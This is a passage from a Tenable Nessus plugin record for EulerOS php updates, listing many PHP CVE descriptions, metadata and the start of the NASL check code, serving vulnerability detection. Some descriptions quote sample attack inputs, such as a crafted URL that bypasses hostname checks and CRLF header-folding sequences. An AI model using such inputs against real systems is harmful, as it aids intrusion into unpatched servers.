or possibly have unspecified other impact via a crafted TAR archive that is mishandled in a Phar::convertToData call.(CVE-2015-5589)\n\n - The phar_get_entry_data function in ext/phar/util.c in PHP before 5.5.30 and 5.6.x before 5.6.14 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a .phar file with a crafted TAR archive entry in which the Link indicator references a file that does not exist.(CVE-2015-7803)\n\n - The phar_parse_zipfile function in zip.c in the PHAR extension in PHP before 5.5.33 and 5.6.x before 5.6.19 allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read and application crash) by placing a PK\\x05\\x06 signature at an invalid location.(CVE-2016-3142)\n\n - The php_url_parse_ex function in ext/standard/url.c in PHP before 5.5.38 allows remote attackers to cause a denial of service (buffer over-read) or possibly have unspecified other impact via vectors involving the smart_str data type.(CVE-2016-6288)\n\n - The php_wddx_push_element function in ext/wddx/wddx.c in PHP before 5.6.26 and 7.x before 7.0.11 allows remote attackers to cause a denial of service (invalid pointer access and out-of-bounds read) or possibly have unspecified other impact via an incorrect boolean element in a wddxPacket XML document, leading to mishandling in a wddx_deserialize call.(CVE-2016-7418)\n\n - The php_wddx_push_element function in ext/wddx/wddx.c in PHP before 5.6.29 and 7.x before 7.0.14 allows remote attackers to cause a denial of service (out-of-bounds read and memory corruption) or possibly have unspecified other impact via an empty boolean element in a wddxPacket XML document.(CVE-2016-9935)\n\n - The sapi_header_op function in main/SAPI.c in PHP before 5.4.38, 5.5.x before 5.5.22, and 5.6.x before 5.6.6 supports deprecated line folding without considering browser compatibility, which allows remote attackers to conduct cross-site scripting (XSS) attacks against Internet Explorer by leveraging (1) %0A%20 or (2) %0D%0A%20 mishandling in the header function.(CVE-2015-8935)\n\n - The SplObjectStorage unserialize implementation in ext/spl/spl_observer.c in PHP before 7.0.12 does not verify that a key is an object, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access) via crafted serialized data.(CVE-2016-7480)\n\n - The xml_parse_into_struct function in ext/xml/xml.c in PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6 allows remote attackers to cause a denial of service (buffer under-read and segmentation fault) or possibly have unspecified other impact via crafted XML data in the second argument, leading to a parser level of zero.(CVE-2016-4539)\n\n - The ZIP signature-verification feature in PHP before 5.6.26 and 7.x before 7.0.11 does not ensure that the uncompressed_filesize field is large enough, which allows remote attackers to cause a denial of service (out-of-bounds memory access) or possibly have unspecified other impact via a crafted PHAR archive, related to ext/phar/util.c and ext/phar/zip.c.(CVE-2016-7414)\n\n - Use-after-free vulnerability in the SPL unserialize implementation in ext/spl/spl_array.c in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12 allows remote attackers to execute arbitrary code via crafted serialized data that triggers misuse of an array field.(CVE-2015-6832)\n\n - Use-after-free vulnerability in the spl_ptr_heap_insert function in ext/spl/spl_heap.c in PHP before 5.5.27 and 5.6.x before 5.6.11 allows remote attackers to execute arbitrary code by triggering a failed SplMinHeap::compare operation.(CVE-2015-4116)\n\n - Use-after-free vulnerability in wddx.c in the WDDX extension in PHP before 5.5.33 and 5.6.x before 5.6.19 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact by triggering a wddx_deserialize call on XML data containing a crafted var element.(CVE-2016-3141)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-12-18T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP3 : php (EulerOS-SA-2019-2649)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4718", "CVE-2014-9767", "CVE-2014-9912", "CVE-2015-4116", "CVE-2015-5161", "CVE-2015-5589", "CVE-2015-6831", "CVE-2015-6832", "CVE-2015-6833", "CVE-2015-7803", "CVE-2015-7804", "CVE-2015-8835", "CVE-2015-8866", "CVE-2015-8874", "CVE-2015-8879", "CVE-2015-8935", "CVE-2016-10158", "CVE-2016-10159", "CVE-2016-10161", "CVE-2016-10397", "CVE-2016-2554", "CVE-2016-3141", "CVE-2016-3142", "CVE-2016-3185", "CVE-2016-4070", "CVE-2016-4539", "CVE-2016-4540", "CVE-2016-4541", "CVE-2016-4542", "CVE-2016-4543", "CVE-2016-5093", "CVE-2016-5094", "CVE-2016-6288", "CVE-2016-6291", "CVE-2016-6292", "CVE-2016-6294", "CVE-2016-7124", "CVE-2016-7125", "CVE-2016-7128", "CVE-2016-7411", "CVE-2016-7412", "CVE-2016-7414", "CVE-2016-7418", "CVE-2016-7480", "CVE-2016-9934", "CVE-2016-9935", "CVE-2017-11143", "CVE-2017-11144", "CVE-2017-11145", "CVE-2017-11147", "CVE-2017-11628", "CVE-2017-12933", "CVE-2017-16642", "CVE-2017-7272", "CVE-2017-9224", "CVE-2017-9226", "CVE-2017-9227", "CVE-2017-9228", "CVE-2017-9229", "CVE-2018-10545", "CVE-2018-10547", "CVE-2018-14851", "CVE-2018-17082", "CVE-2018-5711", "CVE-2018-5712", "CVE-2019-11043"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:php", "p-cpe:/a:huawei:euleros:php-cli", "p-cpe:/a:huawei:euleros:php-common", "p-cpe:/a:huawei:euleros:php-gd", "p-cpe:/a:huawei:euleros:php-ldap", "p-cpe:/a:huawei:euleros:php-mysql", "p-cpe:/a:huawei:euleros:php-odbc", "p-cpe:/a:huawei:euleros:php-pdo", "p-cpe:/a:huawei:euleros:php-pgsql", "p-cpe:/a:huawei:euleros:php-process", "p-cpe:/a:huawei:euleros:php-recode", "p-cpe:/a:huawei:euleros:php-soap", "p-cpe:/a:huawei:euleros:php-xml", "p-cpe:/a:huawei:euleros:php-xmlrpc", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2019-2649.NASL", "href": "https://www.tenable.com/plugins/nessus/132184", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132184);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2011-4718\",\n \"CVE-2014-9767\",\n \"CVE-2014-9912\",\n \"CVE-2015-4116\",\n \"CVE-2015-5589\",\n \"CVE-2015-6831\",\n \"CVE-2015-6832\",\n \"CVE-2015-6833\",\n \"CVE-2015-7803\",\n \"CVE-2015-7804\",\n \"CVE-2015-8835\",\n \"CVE-2015-8866\",\n \"CVE-2015-8874\",\n \"CVE-2015-8879\",\n \"CVE-2015-8935\",\n \"CVE-2016-10158\",\n \"CVE-2016-10159\",\n \"CVE-2016-10161\",\n \"CVE-2016-10397\",\n \"CVE-2016-2554\",\n \"CVE-2016-3141\",\n \"CVE-2016-3142\",\n \"CVE-2016-3185\",\n \"CVE-2016-4070\",\n \"CVE-2016-4539\",\n \"CVE-2016-4540\",\n \"CVE-2016-4541\",\n \"CVE-2016-4542\",\n \"CVE-2016-4543\",\n \"CVE-2016-5093\",\n \"CVE-2016-5094\",\n \"CVE-2016-6288\",\n \"CVE-2016-6291\",\n \"CVE-2016-6292\",\n \"CVE-2016-6294\",\n \"CVE-2016-7124\",\n \"CVE-2016-7125\",\n \"CVE-2016-7128\",\n \"CVE-2016-7411\",\n \"CVE-2016-7412\",\n \"CVE-2016-7414\",\n \"CVE-2016-7418\",\n \"CVE-2016-7480\",\n \"CVE-2016-9934\",\n \"CVE-2016-9935\",\n \"CVE-2017-11143\",\n \"CVE-2017-11144\",\n \"CVE-2017-11147\",\n \"CVE-2017-11628\",\n \"CVE-2017-12933\",\n \"CVE-2017-16642\",\n \"CVE-2017-7272\",\n \"CVE-2017-9224\",\n \"CVE-2017-9226\",\n \"CVE-2017-9227\",\n \"CVE-2017-9228\",\n \"CVE-2017-9229\",\n \"CVE-2018-10545\",\n \"CVE-2018-10547\",\n \"CVE-2018-14851\",\n \"CVE-2018-17082\",\n \"CVE-2018-5711\",\n \"CVE-2018-5712\",\n \"CVE-2019-11043\"\n );\n script_bugtraq_id(61929, 75974);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0695\");\n\n script_name(english:\"EulerOS 2.0 SP3 : php (EulerOS-SA-2019-2649)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the php packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerabilities :\n\n - ** DISPUTED ** Integer overflow in the\n php_raw_url_encode function in ext/standard/url.c in\n PHP before 5.5.34, 5.6.x before 5.6.20, and 7.x before\n 7.0.5 allows remote attackers to cause a denial of\n service (application crash) via a long string to the\n rawurlencode function. NOTE: the vendor says 'Not sure\n if this qualifies as security issue (probably\n not).'(CVE-2016-4070)\n\n - An issue was discovered in ext/phar/phar_object.c in\n PHP before 5.6.36, 7.0.x before 7.0.30, 7.1.x before\n 7.1.17, and 7.2.x before 7.2.5. There is Reflected XSS\n on the PHAR 403 and 404 error pages via request data of\n a request for a .phar file. NOTE: this vulnerability\n exists because of an incomplete fix for\n CVE-2018-5712.(CVE-2018-10547)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in\n Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP\n through 7.1.5. A heap out-of-bounds write occurs in\n bitset_set_range() during regular expression\n compilation due to an uninitialized variable from an\n incorrect state transition. An incorrect state\n transition in parse_char_class() could create an\n execution path that leaves a critical local variable\n uninitialized until it's used as an index, resulting in\n an out-of-bounds write memory\n corruption.(CVE-2017-9228)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in\n Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP\n through 7.1.5. A heap out-of-bounds write or read\n occurs in next_state_val() during regular expression\n compilation. Octal numbers larger than 0xff are not\n handled correctly in fetch_token() and\n fetch_token_in_cc(). A malformed regular expression\n containing an octal number in the form of '\\700' would\n produce an invalid code point value larger than 0xff in\n next_state_val(), resulting in an out-of-bounds write\n memory corruption.(CVE-2017-9226)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in\n Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP\n through 7.1.5. A SIGSEGV occurs in\n left_adjust_char_head() during regular expression\n compilation. Invalid handling of reg->dmax in\n forward_search_range() could result in an invalid\n pointer dereference, normally as an immediate\n denial-of-service condition.(CVE-2017-9229)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in\n Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP\n through 7.1.5. A stack out-of-bounds read occurs in\n match_at() during regular expression searching. A\n logical error involving order of validation and access\n in match_at() could result in an out-of-bounds read\n from a stack buffer.(CVE-2017-9224)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in\n Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP\n through 7.1.5. A stack out-of-bounds read occurs in\n mbc_enc_len() during regular expression searching.\n Invalid handling of reg->dmin in forward_search_range()\n could result in an invalid pointer dereference, as an\n out-of-bounds read from a stack buffer.(CVE-2017-9227)\n\n - An issue was discovered in PHP before 5.6.33, 7.0.x\n before 7.0.27, 7.1.x before 7.1.13, and 7.2.x before\n 7.2.1. There is Reflected XSS on the PHAR 404 error\n page via the URI of a request for a .phar\n file.(CVE-2018-5712)\n\n - An issue was discovered in PHP before 5.6.35, 7.0.x\n before 7.0.29, 7.1.x before 7.1.16, and 7.2.x before\n 7.2.4. Dumpable FPM child processes allow bypassing\n opcache access controls because fpm_unix.c makes a\n PR_SET_DUMPABLE prctl call, allowing one user (in a\n multiuser environment) to obtain sensitive information\n from the process memory of a second user's PHP\n applications by running gcore on the PID of the PHP-FPM\n worker process.(CVE-2018-10545)\n\n - Directory traversal vulnerability in the PharData class\n in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x\n before 5.6.12 allows remote attackers to write to\n arbitrary files via a .. (dot dot) in a ZIP archive\n entry that is mishandled during an extractTo\n call.(CVE-2015-6833)\n\n - Directory traversal vulnerability in the\n ZipArchive::extractTo function in ext/zip/php_zip.c in\n PHP before 5.4.45, 5.5.x before 5.5.29, and 5.6.x\n before 5.6.13 and ext/zip/ext_zip.cpp in HHVM before\n 3.12.1 allows remote attackers to create arbitrary\n empty directories via a crafted ZIP\n archive.(CVE-2014-9767)\n\n - exif_process_IFD_in_MAKERNOTE in ext/exif/exif.c in PHP\n before 5.6.37, 7.0.x before 7.0.31, 7.1.x before\n 7.1.20, and 7.2.x before 7.2.8 allows remote attackers\n to cause a denial of service (out-of-bounds read and\n application crash) via a crafted JPEG\n file.(CVE-2018-14851)\n\n - ext/libxml/libxml.c in PHP before 5.5.22 and 5.6.x\n before 5.6.6, when PHP-FPM is used, does not isolate\n each thread from libxml_disable_entity_loader changes\n in other threads, which allows remote attackers to\n conduct XML External Entity (XXE) and XML Entity\n Expansion (XEE) attacks via a crafted XML document, a\n related issue to CVE-2015-5161.(CVE-2015-8866)\n\n - ext/mysqlnd/mysqlnd_wireprotocol.c in PHP before 5.6.26\n and 7.x before 7.0.11 does not verify that a BIT field\n has the UNSIGNED_FLAG flag, which allows remote MySQL\n servers to cause a denial of service (heap-based buffer\n overflow) or possibly have unspecified other impact via\n crafted field metadata.(CVE-2016-7412)\n\n - ext/session/session.c in PHP before 5.6.25 and 7.x\n before 7.0.10 skips invalid session names in a way that\n triggers incorrect parsing, which allows remote\n attackers to inject arbitrary-type session data by\n leveraging control of a session name, as demonstrated\n by object injection.(CVE-2016-7125)\n\n - ext/standard/var_unserializer.c in PHP before 5.6.25\n and 7.x before 7.0.10 mishandles certain invalid\n objects, which allows remote attackers to cause a\n denial of service or possibly have unspecified other\n impact via crafted serialized data that leads to a (1)\n __destruct call or (2) magic method\n call.(CVE-2016-7124)\n\n - ext/standard/var_unserializer.re in PHP before 5.6.26\n mishandles object-deserialization failures, which\n allows remote attackers to cause a denial of service\n (memory corruption) or possibly have unspecified other\n impact via an unserialize call that references a\n partially constructed object.(CVE-2016-7411)\n\n - ext/wddx/wddx.c in PHP before 5.6.28 and 7.x before\n 7.0.13 allows remote attackers to cause a denial of\n service (NULL pointer dereference) via crafted\n serialized data in a wddxPacket XML document, as\n demonstrated by a PDORow string.(CVE-2016-9934)\n\n - gd_gif_in.c in the GD Graphics Library (aka libgd), as\n used in PHP before 5.6.33, 7.0.x before 7.0.27, 7.1.x\n before 7.1.13, and 7.2.x before 7.2.1, has an integer\n signedness error that leads to an infinite loop via a\n crafted GIF file, as demonstrated by a call to the\n imagecreatefromgif or imagecreatefromstring PHP\n function. This is related to GetCode_ and\n gdImageCreateFromGifCtx.(CVE-2018-5711)\n\n - In PHP before 5.6.28 and 7.x before 7.0.13, incorrect\n handling of various URI components in the URL parser\n could be used by attackers to bypass hostname-specific\n URL checks, as demonstrated by\n evil.example.com:80#@good.example.com/ and\n evil.example.com:80?@good.example.com/ inputs to the\n parse_url function (implemented in the php_url_parse_ex\n function in ext/standard/url.c).(CVE-2016-10397)\n\n - In PHP before 5.6.30 and 7.x before 7.0.15, the PHAR\n archive handler could be used by attackers supplying\n malicious archive files to crash the PHP interpreter or\n potentially disclose information due to a buffer\n over-read in the phar_parse_pharfile function in\n ext/phar/phar.c.(CVE-2017-11147)\n\n - In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x\n before 7.1.7, a stack-based buffer overflow in the\n zend_ini_do_op() function in Zend/zend_ini_parser.c\n could cause a denial of service or potentially allow\n executing code. NOTE: this is only relevant for PHP\n applications that accept untrusted input (instead of\n the system's php.ini file) for the parse_ini_string or\n parse_ini_file function, e.g., a web application for\n syntax validation of php.ini\n directives.(CVE-2017-11628)\n\n - In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x\n before 7.1.7, the openssl extension PEM sealing code\n did not check the return value of the OpenSSL sealing\n function, which could lead to a crash of the PHP\n interpreter, related to an interpretation conflict for\n a negative number in ext/openssl/openssl.c, and an\n OpenSSL documentation omission.(CVE-2017-11144)\n\n - In PHP before 5.6.31, an invalid free in the WDDX\n deserialization of boolean parameters could be used by\n attackers able to inject XML for deserialization to\n crash the PHP interpreter, related to an invalid free\n for an empty boolean element in\n ext/wddx/wddx.c.(CVE-2017-11143)\n\n - In PHP before 5.6.32, 7.x before 7.0.25, and 7.1.x\n before 7.1.11, an error in the date extension's\n timelib_meridian handling of 'front of' and 'back of'\n directives could be used by attackers able to supply\n date strings to leak information from the interpreter,\n related to ext/date/lib/parse_date.c out-of-bounds\n reads affecting the php_parse_date function. NOTE: this\n is a different issue than\n CVE-2017-11145.(CVE-2017-16642)\n\n - In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24\n and 7.3.x below 7.3.11 in certain configurations of FPM\n setup it is possible to cause FPM module to write past\n allocated buffers into the space reserved for FCGI\n protocol data, thus opening the possibility of remote\n code execution.(CVE-2019-11043)\n\n - Integer overflow in the phar_parse_pharfile function in\n ext/phar/phar.c in PHP before 5.6.30 and 7.0.x before\n 7.0.15 allows remote attackers to cause a denial of\n service (memory consumption or application crash) via a\n truncated manifest entry in a PHAR\n archive.(CVE-2016-10159)\n\n - Integer overflow in the php_html_entities function in\n ext/standard/html.c in PHP before 5.5.36 and 5.6.x\n before 5.6.22 allows remote attackers to cause a denial\n of service or possibly have unspecified other impact by\n triggering a large output string from the\n htmlspecialchars function.(CVE-2016-5094)\n\n - Multiple use-after-free vulnerabilities in SPL in PHP\n before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before\n 5.6.12 allow remote attackers to execute arbitrary code\n via vectors involving (1) ArrayObject, (2)\n SplObjectStorage, and (3) SplDoublyLinkedList, which\n are mishandled during unserialization.(CVE-2015-6831)\n\n - Off-by-one error in the phar_parse_zipfile function in\n ext/phar/zip.c in PHP before 5.5.30 and 5.6.x before\n 5.6.14 allows remote attackers to cause a denial of\n service (uninitialized pointer dereference and\n application crash) by including the / filename in a\n .zip PHAR archive.(CVE-2015-7804)\n\n - PHP through 7.1.11 enables potential SSRF in\n applications that accept an fsockopen or pfsockopen\n hostname argument with an expectation that the port\n number is constrained. Because a :port syntax is\n recognized, fsockopen will use the port number that is\n specified in the hostname argument, instead of the port\n number in the second argument of the\n function.(CVE-2017-7272)\n\n - Session fixation vulnerability in the Sessions\n subsystem in PHP before 5.5.2 allows remote attackers\n to hijack web sessions by specifying a session\n ID.(CVE-2011-4718)\n\n - Stack consumption vulnerability in GD in PHP before\n 5.6.12 allows remote attackers to cause a denial of\n service via a crafted imagefilltoborder\n call.(CVE-2015-8874)\n\n - Stack-based buffer overflow in ext/phar/tar.c in PHP\n before 5.5.32, 5.6.x before 5.6.18, and 7.x before\n 7.0.3 allows remote attackers to cause a denial of\n service (application crash) or possibly have\n unspecified other impact via a crafted TAR\n archive.(CVE-2016-2554)\n\n - The Apache2 component in PHP before 5.6.38, 7.0.x\n before 7.0.32, 7.1.x before 7.1.22, and 7.2.x before\n 7.2.10 allows XSS via the body of a 'Transfer-Encoding:\n chunked' request, because the bucket brigade is\n mishandled in the php_handler function in\n sapi/apache2handler/sapi_apache2.c.(CVE-2018-17082)\n\n - The exif_convert_any_to_int function in ext/exif/exif.c\n in PHP before 5.6.30, 7.0.x before 7.0.15, and 7.1.x\n before 7.1.1 allows remote attackers to cause a denial\n of service (application crash) via crafted EXIF data\n that triggers an attempt to divide the minimum\n representable negative integer by -1.(CVE-2016-10158)\n\n - The exif_process_IFD_in_JPEG function in\n ext/exif/exif.c in PHP before 5.5.35, 5.6.x before\n 5.6.21, and 7.x before 7.0.6 does not validate IFD\n sizes, which allows remote attackers to cause a denial\n of service (out-of-bounds read) or possibly have\n unspecified other impact via crafted header\n data.(CVE-2016-4543)\n\n - The exif_process_IFD_in_MAKERNOTE function in\n ext/exif/exif.c in PHP before 5.5.38, 5.6.x before\n 5.6.24, and 7.x before 7.0.9 allows remote attackers to\n cause a denial of service (out-of-bounds array access\n and memory corruption), obtain sensitive information\n from process memory, or possibly have unspecified other\n impact via a crafted JPEG image.(CVE-2016-6291)\n\n - The exif_process_IFD_in_TIFF function in\n ext/exif/exif.c in PHP before 5.6.25 and 7.x before\n 7.0.10 mishandles the case of a thumbnail offset that\n exceeds the file size, which allows remote attackers to\n obtain sensitive information from process memory via a\n crafted TIFF image.(CVE-2016-7128)\n\n - The exif_process_IFD_TAG function in ext/exif/exif.c in\n PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before\n 7.0.6 does not properly construct spprintf arguments,\n which allows remote attackers to cause a denial of\n service (out-of-bounds read) or possibly have\n unspecified other impact via crafted header\n data.(CVE-2016-4542)\n\n - The exif_process_user_comment function in\n ext/exif/exif.c in PHP before 5.5.38, 5.6.x before\n 5.6.24, and 7.x before 7.0.9 allows remote attackers to\n cause a denial of service (NULL pointer dereference and\n application crash) via a crafted JPEG\n image.(CVE-2016-6292)\n\n - The finish_nested_data function in\n ext/standard/var_unserializer.re in PHP before 5.6.31,\n 7.0.x before 7.0.21, and 7.1.x before 7.1.7 is prone to\n a buffer over-read while unserializing untrusted data.\n Exploitation of this issue can have an unspecified\n impact on the integrity of PHP.(CVE-2017-12933)\n\n - The get_icu_disp_value_src_php function in\n ext/intl/locale/locale_methods.c in PHP before 5.3.29,\n 5.4.x before 5.4.30, and 5.5.x before 5.5.14 does not\n properly restrict calls to the ICU uresbund.cpp\n component, which allows remote attackers to cause a\n denial of service (buffer overflow) or possibly have\n unspecified other impact via a locale_get_display_name\n call with a long first argument.(CVE-2014-9912)\n\n - The get_icu_value_internal function in\n ext/intl/locale/locale_methods.c in PHP before 5.5.36,\n 5.6.x before 5.6.22, and 7.x before 7.0.7 does not\n ensure the presence of a '\\0' character, which allows\n remote attackers to cause a denial of service\n (out-of-bounds read) or possibly have unspecified other\n impact via a crafted locale_get_primary_language\n call.(CVE-2016-5093)\n\n - The grapheme_stripos function in\n ext/intl/grapheme/grapheme_string.c in PHP before\n 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6\n allows remote attackers to cause a denial of service\n (out-of-bounds read) or possibly have unspecified other\n impact via a negative offset.(CVE-2016-4540)\n\n - The grapheme_strpos function in\n ext/intl/grapheme/grapheme_string.c in PHP before\n 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6\n allows remote attackers to cause a denial of service\n (out-of-bounds read) or possibly have unspecified other\n impact via a negative offset.(CVE-2016-4541)\n\n - The locale_accept_from_http function in\n ext/intl/locale/locale_methods.c in PHP before 5.5.38,\n 5.6.x before 5.6.24, and 7.x before 7.0.9 does not\n properly restrict calls to the ICU\n uloc_acceptLanguageFromHTTP function, which allows\n remote attackers to cause a denial of service\n (out-of-bounds read) or possibly have unspecified other\n impact via a call with a long argument.(CVE-2016-6294)\n\n - The make_http_soap_request function in\n ext/soap/php_http.c in PHP before 5.4.44, 5.5.x before\n 5.5.28, 5.6.x before 5.6.12, and 7.x before 7.0.4\n allows remote attackers to obtain sensitive information\n from process memory or cause a denial of service (type\n confusion and application crash) via crafted serialized\n _cookies data, related to the SoapClient::__call method\n in ext/soap/soap.c.(CVE-2016-3185)\n\n - The make_http_soap_request function in\n ext/soap/php_http.c in PHP before 5.4.44, 5.5.x before\n 5.5.28, and 5.6.x before 5.6.12 does not properly\n retrieve keys, which allows remote attackers to cause a\n denial of service (NULL pointer dereference, type\n confusion, and application crash) or possibly execute\n arbitrary code via crafted serialized data representing\n a numerically indexed _cookies array, related to the\n SoapClient::__call method in\n ext/soap/soap.c.(CVE-2015-8835)\n\n - The object_common1 function in\n ext/standard/var_unserializer.c in PHP before 5.6.30,\n 7.0.x before 7.0.15, and 7.1.x before 7.1.1 allows\n remote attackers to cause a denial of service (buffer\n over-read and application crash) via crafted serialized\n data that is mishandled in a finish_nested_data\n call.(CVE-2016-10161)\n\n - The odbc_bindcols function in ext/odbc/php_odbc.c in\n PHP before 5.6.12 mishandles driver behavior for\n SQL_WVARCHAR columns, which allows remote attackers to\n cause a denial of service (application crash) in\n opportunistic circumstances by leveraging use of the\n odbc_fetch_array function to access a certain type of\n Microsoft SQL Server table.(CVE-2015-8879)\n\n - The phar_convert_to_other function in\n ext/phar/phar_object.c in PHP before 5.4.43, 5.5.x\n before 5.5.27, and 5.6.x before 5.6.11 does not\n validate a file pointer before a close operation, which\n allows remote attackers to cause a denial of service\n (segmentation fault) or possibly have unspecified other\n impact via a crafted TAR archive that is mishandled in\n a Phar::convertToData call.(CVE-2015-5589)\n\n - The phar_get_entry_data function in ext/phar/util.c in\n PHP before 5.5.30 and 5.6.x before 5.6.14 allows remote\n attackers to cause a denial of service (NULL pointer\n dereference and application crash) via a .phar file\n with a crafted TAR archive entry in which the Link\n indicator references a file that does not\n exist.(CVE-2015-7803)\n\n - The phar_parse_zipfile function in zip.c in the PHAR\n extension in PHP before 5.5.33 and 5.6.x before 5.6.19\n allows remote attackers to obtain sensitive information\n from process memory or cause a denial of service\n (out-of-bounds read and application crash) by placing a\n PK\\x05\\x06 signature at an invalid\n location.(CVE-2016-3142)\n\n - The php_url_parse_ex function in ext/standard/url.c in\n PHP before 5.5.38 allows remote attackers to cause a\n denial of service (buffer over-read) or possibly have\n unspecified other impact via vectors involving the\n smart_str data type.(CVE-2016-6288)\n\n - The php_wddx_push_element function in ext/wddx/wddx.c\n in PHP before 5.6.26 and 7.x before 7.0.11 allows\n remote attackers to cause a denial of service (invalid\n pointer access and out-of-bounds read) or possibly have\n unspecified other impact via an incorrect boolean\n element in a wddxPacket XML document, leading to\n mishandling in a wddx_deserialize call.(CVE-2016-7418)\n\n - The php_wddx_push_element function in ext/wddx/wddx.c\n in PHP before 5.6.29 and 7.x before 7.0.14 allows\n remote attackers to cause a denial of service\n (out-of-bounds read and memory corruption) or possibly\n have unspecified other impact via an empty boolean\n element in a wddxPacket XML document.(CVE-2016-9935)\n\n - The sapi_header_op function in main/SAPI.c in PHP\n before 5.4.38, 5.5.x before 5.5.22, and 5.6.x before\n 5.6.6 supports deprecated line folding without\n considering browser compatibility, which allows remote\n attackers to conduct cross-site scripting (XSS) attacks\n against Internet Explorer by leveraging (1) %0A%20 or\n (2) %0D%0A%20 mishandling in the header\n function.(CVE-2015-8935)\n\n - The SplObjectStorage unserialize implementation in\n ext/spl/spl_observer.c in PHP before 7.0.12 does not\n verify that a key is an object, which allows remote\n attackers to execute arbitrary code or cause a denial\n of service (uninitialized memory access) via crafted\n serialized data.(CVE-2016-7480)\n\n - The xml_parse_into_struct function in ext/xml/xml.c in\n PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before\n 7.0.6 allows remote attackers to cause a denial of\n service (buffer under-read and segmentation fault) or\n possibly have unspecified other impact via crafted XML\n data in the second argument, leading to a parser level\n of zero.(CVE-2016-4539)\n\n - The ZIP signature-verification feature in PHP before\n 5.6.26 and 7.x before 7.0.11 does not ensure that the\n uncompressed_filesize field is large enough, which\n allows remote attackers to cause a denial of service\n (out-of-bounds memory access) or possibly have\n unspecified other impact via a crafted PHAR archive,\n related to ext/phar/util.c and\n ext/phar/zip.c.(CVE-2016-7414)\n\n - Use-after-free vulnerability in the SPL unserialize\n implementation in ext/spl/spl_array.c in PHP before\n 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12\n allows remote attackers to execute arbitrary code via\n crafted serialized data that triggers misuse of an\n array field.(CVE-2015-6832)\n\n - Use-after-free vulnerability in the spl_ptr_heap_insert\n function in ext/spl/spl_heap.c in PHP before 5.5.27 and\n 5.6.x before 5.6.11 allows remote attackers to execute\n arbitrary code by triggering a failed\n SplMinHeap::compare operation.(CVE-2015-4116)\n\n - Use-after-free vulnerability in wddx.c in the WDDX\n extension in PHP before 5.5.33 and 5.6.x before 5.6.19\n allows remote attackers to cause a denial of service\n (memory corruption and application crash) or possibly\n have unspecified other impact by triggering a\n wddx_deserialize call on XML data containing a crafted\n var element.(CVE-2016-3141)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2649\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cd44f4b5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-2554\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2019-11043\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP-FPM Underflow RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-common\");\n 